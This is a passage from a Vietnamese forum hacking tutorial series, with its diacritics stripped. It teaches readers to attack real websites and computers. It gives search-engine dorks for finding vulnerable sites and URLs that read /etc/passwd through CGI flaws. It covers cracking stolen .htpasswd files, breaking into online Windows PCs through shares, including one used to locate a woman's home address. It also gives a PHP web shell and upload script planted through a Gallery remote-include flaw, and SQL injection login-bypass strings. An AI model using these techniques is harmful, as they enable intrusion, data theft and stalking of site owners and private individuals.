web servers xem nh l cc file cu hnh. Cc file ny s b n i (hidden) khi bn xem
qua th mc c bo v bng file .htaccess .Hai h s ny c nhim v iu khin s
truy nhp ti ci link an ton m bn mun xm nhp . Mt ci qun l mt khu v
user name , mt ci qun l cng vic m ho nhng thng tin cho file kia . Khi bn nhp
ng c 2 th ci link mi m ra . Bn hy nhn VD sau :

CODE
Graham:F#.DG*m38d%RF
Webmaster:GJA54j.3g9#$@f

Username bn c th c c ri , cn ci pass bn nhn c hiu m t g khng ? D
nhin l khng ri . bn c hiu v sao khng m bn khng th c c chng khng ?
ci ny n c s can thip ca thng file .htaccess . Do khi cng trong cng th mc
chng c tc ng qua li bo v ln nhau nn chng ta cng khng di g m c gng
t nhp ri crack m mt khu cht tit ( khi cha c ngh crack mt khu trong
tay . Ti cng ang nghin cu c th xm nhp trc tip , nu thnh cng ti s post
ln cho cc bn ) . Li l y , chuyn g s xy ra nu ci .htpasswd nm ngoi th
mc bo v c file .htaccess ? Ta s chm c n d dng , bn hy xem link VD sau :

http://www.company.com/cgi-bin/protected/

hy kim tra xem file .htpasswd c c bo v bI .htaccess hay khng , ta nhp URL
sau :

http://www.company.com/cgi-bin/protected/.htp%20asswd

Nu bn thy c cu tr lI `File not found` hoc tng t th chc chn file ny khng
c bo v , bn hy tm ra n bng mt trong cc URL sau :

http://www.company.com/.htpasswd</ a>
http://www.company.com/cgi-bin/.htpasswd
http://www.company.com/cgi-bin/passwords/.htp%20asswd
http://www.company.com/cgi-bin/passwd/.htpass%20wd

nu vn khng thy th cc bn hy c tm bng cc URL khc tng t ( c th n nm
ngay th mc gc y ) , cho n khi no cc bn tm thy th thi nh .
Khi tm thy file ny ri , bn hy dng chng trnh ``John the ripper`` hoc
``Crackerjack``, crack passwd ct trong . Cng vic tip theo hn cc bn bit l
mnh phi lm g rI , ly user name v passwd hp l t nhp vo ri xem th my c
cu tm s nhng g trong , nhng cc bn cng ng c i pass ca h hay quy
h nh .
Cch ny cc bn cng c th p dng ly pass ca admin v hu ht nhng thnh vin
trong nhm kn u l c chc c quyn c .

23 . ) Tm hiu v CGI ?

_ CGI l t vit tt ca Common Gateway Interface , a s cc Website u ang s dng
chng trnh CGI ( c gI l CGI script ) thc hin nhng cng vic cn thit 24
gi hng ngy . Nhng nguyn bn CGI script thc cht l nhng chng trnh c vit
v c upload ln trang Web vI nhng ngn ng ch yu l Perl , C , C++ , Vbscript
trong Perl c a chung nht v s d dng trong vic vit chng trnh ,chim mt
dung lng t v nht l n c th chy lin tc trong 24 gi trong ngy .
_ Thng thng , CGI script c ct trong th mc /cgi-bin/ trn trang Web nh VD sau
:

http://www.company.com/cgi-bin/login.cgi

vi nhng cng vic c th nh :
+ To ra chng trnh m s ngi gh thm .
+ Cho php nhng ngI khch lm nhng g v khng th lm nhng g trn Website
ca bn .
+ Qun l user name v passwd ca thnh vin .
+ Cung cp dch v Mail .
+ Cung cp nhng trang lin kt v thc hin tin nhn qua li gia cc thnh vin .
+ Cung cp nhng thng bo li chi tit .v.v..

24 . ) Cch hack Web c bn nht thng qua CGI script :

_ Li th 1 : li nph-test-cgi

+ nh tn trang Web b li vo trong trnh duyt ca bn .
+ nh dng sau vo cuI cng : /cgi-bin/nph-test-cgi
+ Lc trn URL bn s nhn ging nh th ny :

http://www.servername.com/cgi-bin/nph-test-cg%20i

+ Nu thnh cng bn s thy cc th mc c ct bn trong . xem th mc no bn
nh tip :

CODE
? /*

+ file cha passwd thng c ct trong th mc /etc , bn hy nh trn URL dng sau
:

http://www.servername.com/cgi-bin/nph-test-cg%20i?/etc/*

_ Li th 2 : li php.cgi

+ Tng t trn bn ch cn nh trn URL dng sau ly pass :

http://www.servername.com/cgi-bin/php.cgi?/et c/passwd

Quan trng l y l nhng li c nn vic tm cc trang Web cc bn thc hnh rt
kh , cc bn hy vo trang google.com ri nh t kho :

/cgi-bin/php.cgi?/etc/passwd]
hoc cgi-bin/nph-test-cgi?/etc

sau cc bn hy tm trn xem th trang no cha fix li thc hnh nh .

25 . ) K thut xm nhp my tnh ang online :

_ Xm nhp my tnh ang online l mt k thut va d lI va kh . Bn c th ni d
khi bn s dng cng c ENT 3 nhng bn s gp vn khi dng n l tc s dng
trn my ca nn nhn s b chm i mt cch ng k v nhng my h khng share th
khng th xm nhp c, do nu h tt my l mnh s b cng cc khi cha kp
chm account , c mt cch m thm hn , t lm gim tc hn v c th xm nhp
khi nn nhn khng share l dng chng trnh DOS tn cng . Ok , ta s bt u :
_ Dng chng trnh scan IP nh ENT 3 scan IP mc tiu .
_ Vo Start == > Run g lnh cmd .
_ Trong ca s DOS hy nh lnh net view

CODE
+ VD : c:\net view 203.162.30.xx

_ Bn hy nhn kt qu , nu n c share th d qu , bn ch cn nh tip lnh

net use < a bt k trn my ca bn > : < share ca nn nhn >

+ VD : c:\net use E : 203.162.30.xxC

_ Nu khi kt ni my nn nhn m c yu cu s dng Passwd th bn hy download
chng trnh d passwd v s dng ( theo ti bn hy load chng trnh pqwak2 p
dng cho vic d passwd trn my s dng HH Win98 hoc Winme v chng trnh
xIntruder dng cho Win NT ) . Ch l v cch s dng th hai chng trnh tng t
nhau , dng u ta nh IP ca nn nhn , dng th hai ta nh tn a share ca nn
nhn nhng i vi xIntruder ta ch chnh Delay ca n cho hp l , trong mng
LAN th Delay ca n l 100 cn trong mng Internet l trn dI 5000 .
_ Nu my ca nn nhn khng c share th ta nh lnh :

net use < a bt k trn my ca bn > : c$ (hoc d$)`àdministrator``

+ VD : net use E : 203.162.30.xxC$`àdministrator``

Kiu chia s bng c$ l mc nh i vi tt c cc my USER l `àdministrator`` .
_ Chng ta c th p dng cch ny t nhp vo my ca c bn m mnh thm
thng trm nh tm nhng d liu lin quan n a ch ca c nng ( vi iu kin
l c ta ang dng my nh v bn may mn khi tm c a ch ) . Bn ch cn
chat Y!Mass ri vo DOS nh lnh :

c:\netstat n

Khi dng cch ny bn hy tt ht cc ca s khc ch khung chat Y!Mass vi c ta
thi , n s gip bn d dng hn trong vic xc nh a ch IP ca c ta . Sau bn
dng cch xm nhp m ti ni trn .( C l anh chng tykhung ca chng ta hi xa
khi tn tnh c bn xa qua mng cng dng cch ny t nhp v tm hiu a ch
ca c ta y m , hi`hi` . )
Bn s thnh cng nu my ca nn nhn khng ci firewall hay proxy .

=================================================== =

Nhiu bn c yu cu ti a ra a ch chnh xc cho cc bn thc tp , nhng ti khng
th a ra c v rt kinh nghim nhng bi hng dn c a ch chnh xc , khi cc
bn thc hnh xong ot c quyn admin c bn xo ci database ca h . Nh vy
HVA s mang ting l ni bt ngun cho s ph hoi trn mng . mong cc bn thng
cm , nu c th th ti ch nu nhng cch thc cc bn tm nhng da ch b li
ch khng a ra a ch c th no .

=================================================== =

phn 4 ti s cp n k thut chng xm nhp vo my tnh ca mnh khi bn
online , tm hiu s cc bc khi ta quyt nh hack mt trang Web , k thut tm ra li
trang Web thc hnh , k thut hack Web thng qua li Gallery.v.v.

GOOKLUCK!!!!!!!!!
4 [12/7/2004 10:37:00 AM]

26 . ) Tm hiu v RPC (Remote Procedure Call) :

_ Windows NT cung cp kh nng s dng RPC thc thi cc ng dng phn tn .
Microsoft RPC bao gm cc th vin v cc dch v cho php cc ng dng phn tn
hot ng c trong mi trng Windows NT. Cc ng dng phn tn chnh bao gm
nhiu tin trnh thc thi vi nhim v xc nh no . Cc tin trnh ny c th chy trn
mt hay nhiu my tnh.

_Microsoft RPC s dng name service provider nh v Servers trn mng. Microsoft
RPC name service provider phi i lin vi Microsoft RPC name service interface (NIS).
NIS bao bao gm cc hm API cho php truy cp nhiu thc th trong cng mt name
service database (name service database cha cc thc th, nhm cc thc th, lch s cc
thc th trn Server).
Khi ci t Windows NT, Microsoft Locator t ng c chn nh l name service
provider. N l name service provider ti u nht trn mi trng mng Windows NT.

27 . ) K thut n gin chng li s xm nhp tri php khi ang online thng
qua RPC (Remote Procedure Call) :

_ Nu bn nghi ng my ca mnh ang c ngi xm nhp hoc b admin remote
desktop theo di , bn ch cn tt chc nng remote procedure call th hin ti khng c
chng trnh no c th remote desktop theo di bn c . N cn chng c hu
ht tools xm nhp vo my ( v a s cc tools vit connect da trn remote procedure
call ( over tcp/ip )).Cc trojan a s cng da vo giao thc ny.

Cch tt: Bn vo service /remote procedure call( click chut phi ) chn starup
typt/disable hoc manual/ apply.

y l cch chng rt hu hiu vi my PC , nu thm vi cch tt file sharing th rt kh
b hack ) ,nhng trong mng LAN bn cng phin phc vi n khng t v bn s khng
chy c cc chng trnh c lin quan n thit b ny . Ty theo cch thc bn lm
vic m bn c cch chn la cho hp l . Theo ti th nu dng trong mng LAN bn
hy ci mt firewall l chc chn tng i an ton ri .

( Da theo bi vit ca huynh i nh c khoai khoaimi admin ca HVA )

28 . ) Nhng bc hack mt trang web hin nay :

_ Theo lit k ca sch Hacking Exposed 3 th hack mt trang Web thng thng ta
thc hin nhng bc sau :
+ FootPrinting : ( In du chn )
y l cch m hacker lm khi mun ly mt lng thng tin ti a v my ch/doanh
nghip/ngi dng. N bao gm chi tit v a ch IP, Whois, DNS ..v.v i khi l
nhng thong tin chnh thc c lien quan n mc tiu. Nhiu khi n gin hacker ch cn
s dng cc cng c tm kim trn mng tm nhng thong tin .
+ Scanning : ( Qut thm d )
Khi c nhng thng tin ri, th tip n l nh gi v nh danh nhng nhng dch
v m mc tiu c. Vic ny bao gm qut cng, xc nh h iu hnh, .v.v.. Cc cng
c c s dng y nh nmap, WS pingPro, siphon, fscam v cn nhiu cng c khc
na.
+ Enumeration : ( lit k tm l hng )
Bc th ba l tm kim nhng ti nguyn c bo v km, hoch ti khon ngi dng
m c th s dng xm nhp. N bao gm cc mt khu mc nh, cc script v dch
v mc nh. Rt nhiu ngi qun tr mng khng bit n hoc khng sa i li cc
gi tr ny.
+ Gaining Access: ( Tm cch xm nhp )
By gi k xm nhp s tm cch truy cp vo mng bng nhng thng tin c c ba
bc trn. Phng php c s dng y c th l tn cng vo li trn b m, ly
v gii m file password, hay th thin nht l brute force (kim tra tt c cc trng hp)
password. Cc cng c thng c s dng bc ny l NAT, podium, hoc L0pht.
+ Escalating Privileges : ( Leo thang c quyn )
V d trong trng hp hacker xm nhp c vo mng vi ti khon guest, th h s
tm cch kim sot ton b h thng. Hacker s tm cch crack password ca admin, hoc
s dng l hng leo thang c quyn. John v Riper l hai chng trnh crack
password rt hay c s dng.
+ Pilfering : ( Dng khi cc file cha pass b s h )
Thm mt ln na cc my tm kim li c s dng tm cc phng php truy cp
vo mng. Nhng file text cha password hay cc c ch khng an ton khc c th l
mi ngon cho hacker.
+ Covering Tracks : ( Xo du vt )
Sau khi c nhng thng tin cn thit, hacker tm cch xo du vt, xo cc file log ca
h iu hnh lm cho ngi qun l khng nhn ra h thng b xm nhp hoc c bit
cng khng tm ra k xm nhp l ai.
+ Creating ``Back Doors`` : ( To ca sau chun b cho ln xm nhp tip theo c d
dng hn )
Hacker li ``Back Doors``, tc l mt c ch cho php hacker truy nhp tr li bng
con ng b mt khng phi tn nhiu cng sc, bng vic ci t Trojan hay to user
mi (i vi t chc c nhiu user). Cng c y l cc loi Trojan, keylog
+ Denial of Service (DoS) : ( Tn cng kiu t chi dch v )
Nu khng thnh cng trong vic xm nhp, th DoS l phng tin cui cng tn
cng h thng. Nu h thng khng c cu hnh ng cch, n s b ph v v cho
php hacker truy cp. Hoc trong trng hp khc th DoS s lm cho h thng khng
hot ng c na. Cc cng c hay c s dng tn cng DoS l trin00, Pong Of
Death, teardrop, cc loi nuker, flooder . Cch ny rt li hi , v vn cn s dng ph
bin hin nay .
_ Tu theo hiu bit v trnh ca mnh m mt hacker b qua bc no . Khng nht
thit phI lm theo tun t . Cc bn hy nh n cu bit ngi bit ta trm trn trm
thng .

( Ti liu ca HVA v hackervn.net )

29 . ) Cch tm cc Website b li :

_ Chc cc bn bit n cc trang Web chuyn dng tm kim thng tin trn mng ch
? Nhng cc bn chc cng khng ng l ta c th dng nhng trang tm nhng
trang Web b li ( Ti vn thng dng trang google.com v khuyn cc bn cng nn
dng trang ny v n rt mnh v hiu qu ) .
_ Cc bn quan tm n li trang Web v mun tm chng bn ch cn vo google.com
v nh on li vo sau allinurl : . VD ta c on m li trang Web sau :

cgi-bin/php.cgi?/etc/passwd

cc bn s nh :

allinurl:cgi-bin/php.cgi?/etc/passwd

N s lit k ra nhng trang Web ang b li ny cho cc bn , cc bn hy nhn xung
di cng ca mi mu lit k ( dng a ch mu xanh l cy ) nu dng no vit y
chang t kho mnh nhp vo th trang hoc ang b li .Cc bn c xm nhp vo
c hay khng th cng cn tu vo trang Web fix li ny hay cha na .
_ Cc bn quan tm n li forum , cc bn mun tm forum dng ny thc tp , ch
cn nhp t kho

powered by

VD sau l tm forum dng Snitz 2000 :

powered by Snitz 2000

_ Tuy nhin , vic tm ra ng forum hoc trang Web b li theo cch c xc sut
khng cao , bn hy quan tm n on string c bit trong URL c trng cho tng
kiu trang Web hoc forum ( ci ny rt quan trng , cc bn hy t mnh tm hiu
thm nh ) . VD tm vi li Hosting Controller th ta s c on c trng sau

``/admin hay /advadmin hay /hosting``

ta hy nh t kho :

allinurl:/advadmin
hoc allinurl:/admin
hoc allinurl:/hosting

N s lit k ra cc trang Web c URL dng :

http://tentrangweb.com/advadmin
hoc http://tentrangweb.com/admin
hoc http://tentrangweb.com/hosting

VD vi forum UBB c on c trng

``cgi-bin/ultimatebb.cgi?``

Ta cng tm tng t nh trn .
Ch cn bn bit cch tm nh vy ri th sau ny ch cn theo di thng tin cp nht bn
trang Li bo mt ca HVA do bn LeonHart post hng ngy cc bn s hiu c
ngha ca chng v t mnh kim tra .

30 . ) K thut hack Web thng qua li Gallery ( mt dng ca li php code inject ):

_ Gallery l mt cng c cho php to mt gallery nh trn web c vit bng PHP , li
dng s h ny ta c th li dng vit thm vo mt m PHP cho php ta upload ,
chnh l mc ch chnh ca ta .
_ Trc ht bn hy ng k mt host min ph , tt nht l bn ng k brinkster.com
cho d . Sau bn m notepad v to file PHP vi on m sau :

CODE
<?php
global $PHP_SELF;
echo ``
<form method=post action=$PHP_SELF?$QUERY_STRING >
<input type=text name=shell size=40 >
<input type=hidden name=act value=shell >
<input type=submit value=Go name=sm >
``;
set_magic_quotes_runtime(1);
if ($act == ``shell``) {
echo ``\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n< xmp > ``;
system($shell);
echo ``

\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n``; }
echo `` ``;
? >

on m ny bn hy to lm 2 file c tn khc nhau ( nhng cng chung mt m ) v
t tn l :
+ shellphp.php : file ny dng chy shell trn victim host .
+ init.php : file ny dng upload ln trang c host bn va to . ( Bn hy upload file
init.php ny ln sm v ta s cn s dng n nhng vi on m khc , bn qun upload
file ny ln l tiu )

Bn hy to thm mt file PHP vi m sau :

CODE
<?php
function handleupload() {
if (is_uploaded_file($_FILES[ùserfile`][`tmp_name`])) {
$filename = $_FILES[ùserfile`][`tmp_name`];
print ``$filename was uploaded successfuly``;
$realname = $_FILES[ùserfile`][`name`];
print ``realname is $realname\n``;
print ``copying file to uploads dir ``.$realname;
copy($_FILES[ùserfile`][`tmp_name`],*PATH*.$realna me); // lu *PATH* chng ta
s thay i sau
} else {
echo ``Possible file upload attack: filename``.$_FILES[ùserfile`][`name`].``.``;
}
}
if ($act == `ùpload``) {
handleupload();
}
echo ``
<form ENCTYPE=multipart/form-data method=post
action=$PHP_SELF?$QUERY_STRING >
File:<INPUT TYPE=FILE NAME=userfile SIZE=35 >
<input type=hidden name=MAX_FILE_SIZE value=1000000 >
<input type=hidden name=act value=upload >
<input type=submit value=Upload name=sm >

``;
? >

Bn hy t tn l upload.php , n s dng upload ln trang Web ca nn nhn .
_ Tip theo Bn vo Google, g ``Powered by gallery`` ri enter, Google s lit k mt
ng nhng site s dng Gallery , bn hy chn ly mt trang bt k rI dng link sau
th xem n cn mc lI Gallery hay khng :

http:// trang Web ca nn nhn >
/gallery./captionator.php?GALLERY_BASEDIR=http://ww wxx.brinkster.com/ /

Nu bn thy hin ln mt hnh ch nht pha trn cng , bn phi ca n l lnh
chuyn tip c ch Go l coi nh bn tm thy c I tng ri . By gi bn
c th g lnh thng qua ch nht hack Web ca nn nhn .
Trc ht bn hy g lnh pwd xc nh ng dn tuyt i n th mc hin thi
ri nhn nt Go , khi n cho kt qu bn hy nhanh chng ghi li ng dn pha
dI ( Ti s s dng VD ng dn ti tm thy l /home/abc/xyz/gallery ).
Sau bn nh tip lnh |s a| lit k cc th mc con ca n . By gi bn hy
nhn kt qu , bn s thy mt ng cc th mc con m ta lit k . Bn hy lun nh
l mc ch ca chng ta l tm mt th mc c th dng upload file upload.php m ta
chun b t trc do bn hy xc nh cng ti bng cch nhn vo nhng ch cuI
cng ca mi hng kt qu :
+ Bn hy loi b trng hp cc th mc m c du . hoc .. v y l th mc gc
hoc l th mc o ( N thng c xp trn cng ca cc hng kt qu ) .
+ Bn cng loI b nhng hng c ch cui cng c gn ui ( VD nh config.php ,
check.inc .v.v ) v y l nhng file ch khng phi l th mc .
+ Cn li l nhng th mc c th upload nhng ti khuyn bn nn chn nhng hng
cha tn th mc m c cha s ln hn 1 ( Bn c th xc nh c chng bng cch
nhn ct th 2 t tri sang ) , v nh vy va chc chn y l th mc khng phi th
mc o , va lm cho admin ca trang Web kh pht hin khi ta ci file ca ta vo .
Ti VD ti pht hin ra th mc loveyou c cha 12 file c th cho ta upload , nh vy
ng dn chnh thc m ta upload ln s l :

/home/abc/xyz/Gallery/loveyou

By gi bn hy vo account host ca bn, sa ni dung file init.php ging nh m ca
file upload.php, nhng sa li *PATH* thnh /home/abc/xyz/gallery/loveyou/ . ng
thi cng chun b mt file upload.php trn my ca bn vi *PATH* l ( 2 du ngoc
kp ).
By gi l ta c th upload file upload.php ln trang Web ca nn nhn c ri , bn
hy nhp a ch sau trn trnh duyt Web ca bn :

http:// trang Web ca nn nhn >
/gallery./captionator.php?GALLERY_BASEDIR=http://ww wxx.brinkster.com/ /

Bn s thy xut hin tip mt khung hnh ch nht v bn cnh l c 2 nt lnh , mt l
nt brown , mt l nt upload . Nt brown bn dng dn n a ch file
upload.php bn chun b trn my ca bn , nt upload khi bn nhn vo th n
s upload file upload.php ln trang Web ca nn nhn . Ok , by gi coi nh bn hon
thnh chng ng hack Web ri . T by gi bn hy vn dng tn cng i th
nh ly database , password ( lm tng t nh cc bi hng dn hack trc ) , nhng
cc bn ch nn thc tp ch ng xo database hay ph Web ca h. Nu l mt hacker
chn chnh cc bn ch cn upload ln trang Web dng ch : Hack by .. l ri .
Cng nh nhng ln trc , cc bn c thnh cng hay khng cng tu thuc vo s may
mn v kin tr nghin cu vn dng kin thc ca cc bn .

( Da theo hng dn hack ca huynh vnofear viethacker.net )

GOODLUCK!!!!!!!!!!!!

( Ht phn 4 )
Anhdenday
HVAonline.net
5 [12/22/2004 9:57:00 AM]

31 . ) Gi tin TCP/IP l g?

TCP/IP vit tt cho Transmission Control Protocol and Internet Protocol, mt Gi tin
TCP/IP l mt khi d liu c nn, sau km thm mt header v gi n mt
my tnh khc. y l cch thc truyn tin ca internet, bng cch gi cc gi tin. Phn
header trong mt gi tin cha a ch IP ca ngi gi gi tin. Bn c th vit li mt gi
tin v lm cho n trong ging nh n t mt ngi khc!! Bn c th dng cch ny
tm cch truy nhp vo rt nhiu h thng m khng b bt. Bn s phi chy trn Linux
hoc c mt chng trnh cho php bn lm iu ny.

32 . ) Linux l gi`:

_Ni theo ngha gc, Linux l nhn ( kernel ) ca HH. Nhn l 1 phn mm m trch
chc v lin lc gia cc chng trnh ng dng my tnh v phn cng. Cung cp cc
chng nng nh: qun l file, qun l b nh o, cc thit b nhp xut nhng cng,
mn hnh, bn phm, .... Nhng Nhn Linux cha phi l 1 HH, v th nn Nhn Linux
cn phi lin kt vi nhng chng trnh ng dng c vit bi t chc GNU to ln 1
HH hon chnh: HH Linux. y cng l l do ti sao chng ta thy GNU/Linux khi
c nhc n Linux.
Tip theo, 1 cng ty hay 1 t chc ng ra ng gi cc sn phm ny ( Nhn v Chng
trnh ng dng ) sau sa cha mt s cu hnh mang c trng ca cng ty/ t chc
mnh v lm thm phn ci t ( Installation Process ) cho b Linux , chng ta c :
Distribution. Cc Distribution khc nhau s lng v loi Software c ng gi cng
nh qu trnh ci t, v cc phin bn ca Nhn. 1 s Distribution ln hin nay ca
Linux l : Debian, Redhat, Mandrake, SlackWare, Suse .

33 . ) Cc lnh cn bn cn bit khi s dng hoc xm nhp vo h thng Linux :

_ Lnh `` man`` : Khi bn mun bit cch s dng lnh no th c th dng ti lnh nay :
Cu trc lnh : $ man .
V d : $ man man
_ Lnh `` uname ``: cho ta bit cc thng tin c bn v h thng
V d : $uname -a ; n s a ra thng tin sau :

Linux gamma 2.4.18 #3 Wed Dec 26 10:50:09 ICT 2001 i686 unknown

_ Lnh id : xem uid/gid hin ti ( xem nhm v tn hin ti )

_ Lnh w : xem cc user ang login v action ca h trn h thng .
V D : $w n s a ra thng tin sau :

10:31pm up 25 days, 4:07, 18 users, load average: 0.06, 0.01, 0.00

_ Lnh ps: xem thng tin cc process trn h thng
V d : $ps axuw
_ Lnh cd : bn mun di chuyn n th mc no . phi nh n lnh ny .
V du : $ cd /usr/bin ---- > n s a bn n th mc bin
_ Lnh mkdir : to 1 th mc .
V d : $ mkdir /home/convit --- > n s to 1 th mc convit trong /home
_ Lnh rmdir : g b th mc
V d : $ rmdir /home/conga ---- > n s g b th mc conga trong /home .
_ Lnh ls: lit k ni dung th mc
V d : $ls -laR /
_ Lnh printf: in d liu c nh dng, ging nh s dng printf() ca C++ .
V d : $printf %s ``\x41\x41\x41\x41``
_ Lnh pwd: a ra th mc hin hnh
V d : $pwd ------ > n s cho ta bit v tr hin thi ca ta u : /home/level1
_ Cc lnh : cp, mv, rm c ngha l : copy, move, delete file
V d vi lnh rm (del) : $rm -rf /var/tmp/blah ----- > n s del file blah .
Lm tng t i vi cc lnh cp , mv .
_ Lnh find : tm kim file, th mc
V d : $find / -user level2
_ Lnh grep: cng c tm kim, cch s dng n gin nht : grep ``something``
Vidu : $ps axuw | grep ``level1``
_ Lnh Strings: in ra tt c cc k t in c trong 1 file. Dng n tm cc khai bo
hnh chui trong chng trnh, hay cc gi hm h thng, c khi tm thy c password
na
VD: $strings /usr/bin/level1
_ Lnh strace: (linux) trace cc gi hm h thng v signal, cc k hu ch theo di
flow ca chng trnh, cch nhanh nht xc nh chng trnh b li on no. Trn
cc h thng unix khc, tool tng ng l truss, ktrace .
V d : $strace /usr/bin/level1
_ Lnh`` cat, more ``: in ni dung file ra mn hnh

$cat /etc/passwd | more -- > n s a ra ni dung file passwd mt cch nhanh nht .
$more /etc/passwd ---- > N s a ra ni dung file passwd mt cch t t .

_ Lnh hexdump : in ra cc gi tr tng ng theo ascii, hex, octal, decimal ca d liu
nhp vo .
V d : $echo AAAA | hexdump
_ Lnh : cc, gcc, make, gdb: cc cng c bin dch v debug .
V d : $gcc -o -g bof bof.c
V d : $make bof
V d : $gdb level1
(gdb) break main
(gdb) run
_ Lnh perl: mt ngn ng
V d : $perl -e `print `À``x1024` | ./bufferoverflow ( Li trn b m khi ta nh vo
1024 k t )
_ Lnh ``bash`` : n lc t ng ho cc tc v ca bn bng shell script, cc mnh
v linh hot .
Bn mun tm hiu v bash , xem n nh th no :
$man bash
_ Lnh ls : Xem ni dung th mc ( Lit k file trong th mc ) .
V D : $ ls /home ---- > s hin ton b file trong th mc Home
$ ls -a ----- > hin ton b file , bao gm c file n
$ ls -l ----- > a ra thng tin v cc file
_ Lnh ghi d liu u ra vo 1 file :
Vd : $ ls /urs/bin > ~/convoi ------ > ghi d liu hin th thng tin ca th mc bin vo 1
file convoi .

34 . ) Nhng hiu bit c bn xung quanh Linux :

a . ) Mt vi th mc quan trng trn server :

_ /home : ni lu gi cc file ngi s dng ( VD : ngi ng nhp h thng c tn l
convit th s c 1 th mc l /home/convit )
_ /bin : Ni x l cc lnh Unix c bn cn thit nh ls chng hn .
_ /usr/bin : Ni x l cc lnh dc bit khc , cc lnh dng bi ngi s dng c bit v
dng qun tr h thng .
_ /bot : Ni m kernel v cc file khc c dng khi khi ng .
_ /ect : Cc file hot ng ph mng , NFS (Network File System ) Th tn ( y l ni
trng yu m chng ta cn khai thc nhiu nht )
_ /var : Cc file qun tr
_ /usr/lib : Cc th vin chun nh libc.a
_ /usr/src : V tr ngun ca cc chng trnh .

b . ) V tr file cha passwd ca mt s phin bn khc nhau :

CODE
AIX 3 /etc/security/passwd !/tcb/auth/files//
A/UX 3.0s /tcb/files/auth/?/*
BSD4.3-Ren /etc/master.passwd *
ConvexOS 10 /etc/shadpw *
ConvexOS 11 /etc/shadow *
DG/UX /etc/tcb/aa/user/ *
EP/IX /etc/shadow x
HP-UX /.secure/etc/passwd *
IRIX 5 /etc/shadow x
Linux 1.1 /etc/shadow *
OSF/1 /etc/passwd[.dir|.pag] *
SCO Unix #.2.x /tcb/auth/files//
SunOS4.1+c2 /etc/security/passwd.adjunct ##username
SunOS 5.0 /etc/shadow
System V Release 4.0 /etc/shadow x
System V Release 4.2 /etc/security/* database
Ultrix 4 /etc/auth[.dir|.pag] *
UNICOS /etc/udb *

35 . ) Khai thc li ca Linux qua l hng bo mt ca WU-FTP server :

_ WU-FTP Server (c pht trin bi i Hc Washington ) l mt phn mm Server
phc v FTP c dng kh ph bin trn cc h thng Unix & Linux ( tt c cc nh
phn phi: Redhat, Caldera, Slackware, Suse, Mandrake....) v c Windows.... , cc
hacker c th thc thi cc cu lnh ca mnh t xa thng qua file globbing bng cch ghi
ln file c trn h thng .
_ Tuy nhin , vic khai thc li ny khng phI l d v n phi hi nhng iu kin
sau :
+ Phi c account trn server .
+ Phi t c Shellcode vo trong b nh Process ca Server .
+ Phi gi mt lnh FTP c bit cha ng mt globbing mu c bit m khng b
server pht hin c li .
+ Hacker s ghi ln mt Function, Code ti mt Shellcode, c th n s c thc thi
bi chnh Server FTP .
_ Ta hy phn tch VD sau v vic ghi ln file ca server FTP :

CODE
ftp > open localhost <== lnh m trang b li .
Connected to localhost (127.0.0.1).
220 sasha FTP server (Version wu-2.6.1-18) ready <== xm nhp thnh cng FTP server
.
Name (localhost:root): anonymous <== Nhp tn ch ny
331 Guest login ok, send your complete e-mail address as password.
Password:..<== nhp mt khu y
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files. <== s dng bin nh phn chuyn i file .
ftp > ls ~{ <== lnh lit k th mc hin hnh .
227 Entering Passive Mode (127,0,0,1,241,205)
421 Service not available, remote server has closed connection
1405 ? S 0:00 ftpd: accepting connections on port 21 chp nhn kt nI cng 21 .
7611 tty3 S 1:29 gdb /usr/sbin/wu.ftpd
26256 ? S 0:00 ftpd:
sasha:anonymous/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
26265 tty3 R 0:00 bash -c ps ax | grep ftpd
(gdb) at 26256
Attaching to program: /usr/sbin/wu.ftpd, process 26256 <== khai thc li Wu.ftpd .
Symbols already loaded for /lib/libcrypt.so.1
Symbols already loaded for /lib/libnsl.so.1
Symbols already loaded for /lib/libresolv.so.2
Symbols already loaded for /lib/libpam.so.0
Symbols already loaded for /lib/libdl.so.2
Symbols already loaded for /lib/i686/libc.so.6
Symbols already loaded for /lib/ld-linux.so.2
Symbols already loaded for /lib/libnss_files.so.2
Symbols already loaded for /lib/libnss_nisplus.so.2
Symbols already loaded for /lib/libnss_nis.so.2
0x40165544 in __libc_read () from /lib/i686/libc.so.6
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
__libc_free (mem=0x61616161) at malloc.c:3136
3136 in malloc.c

Vic khai thc qua li ny n nay ti test vn cha thnh cng ( chng bit lm sai ch
no ) . Vy bn no lm c hy post ln cho anh em bit nh .
Li Linux hin nay rt t ( c bit l i vi Redhat ), cc bn hy ch i nu c li g
mi th bn LI bo mt s cp nht ngay . Khai thc chng nh th no th hi Mod
qun l bn , c bit l bn Leonhart , cu ta sing tr li cc bn lm .

( Da theo bi vit ca huynh Binhnx2000 )

36 . ) Tm hiu v SQL Injection :

_ SQL Injection l mt trong nhng kiu hack web ang dn tr nn ph bin hin nay.
Bng cch inject cc m SQL query/command vo input trc khi chuyn cho ng dng
web x l, bn c th login m khng cn username v password, thi hnh lnh t xa,
ot d liu v ly root ca SQL server. Cng c dng tn cng l mt trnh duyt
web bt k, chng hn nh Internet Explorer, Netscape, Lynx, ...
_ Bn c th kim c trang Web b li bng cch dng cc cng c tm kim kim
cc trang cho php submit d liu . Mt s trang Web chuyn tham s qua cc khu vc
n nn bn phI viewsource mI thy c . VD ta xc nh c trang ny s dng
Submit d liu nh nhn vo m m ta viewsource :

CODE
<input type=hidden name=A value=C >

_ Kim tra th xem trang Web c b li ny hay khng bng cch nhp vo login v pass
ln lt nh sau :

- Login: hi` or 1=1--
- Pass: hi` or 1=1--

Nu khng c bn th tip vi cc login v pass sau :

CODE
` or 1=1--
`` or 1=1--
or 1=1--
` or à`=à
`` or `à``=`à
`) or (à`=à

Nu thnh cng, bn c th login vo m khng cn phi bit username v password .
Li ny c dnh dng n Query nn nu bn no tng hc qua c s d liu c th
khai thc d dng ch bng cch nh cc lnh Query trn trnh duyt ca cc bn . Nu
cc bn mun tm hiu k cng hn v li ny c th tm cc bi vit ca nhm vicky
tm hiu thm .

37 . ) Mt VD v hack Web thng qua li admentor ( Mt dng ca li SQL
Injection ) :

_ Trc tin bn vo google.com tm trang Web admentor bng t kho allinurl :
admentor .
_ Thng thng bn s c kt qu sau :

http://www.someserver.com/admentor/admin/admi%20n.asp

_ Bn th nhp ` or ``=` vo login v password :

CODE
